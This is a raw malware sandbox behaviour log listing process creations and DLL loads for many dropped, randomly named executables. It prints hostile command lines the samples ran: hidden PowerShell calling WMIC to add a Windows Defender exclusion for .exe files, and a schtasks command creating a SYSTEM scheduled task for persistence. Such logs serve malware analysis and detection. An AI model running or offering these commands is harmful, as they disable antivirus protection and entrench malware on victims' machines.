                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                        Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeProcess created: unknown unknown
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: msvcr100.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpedit.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: activeds.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dssec.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dsuiext.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: framedynos.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dsrole.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: logoncli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mpr.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: activeds.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ntdsapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: authz.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: adsldpc.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: adsldpc.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: webio.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: schannel.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fhsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msidle.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
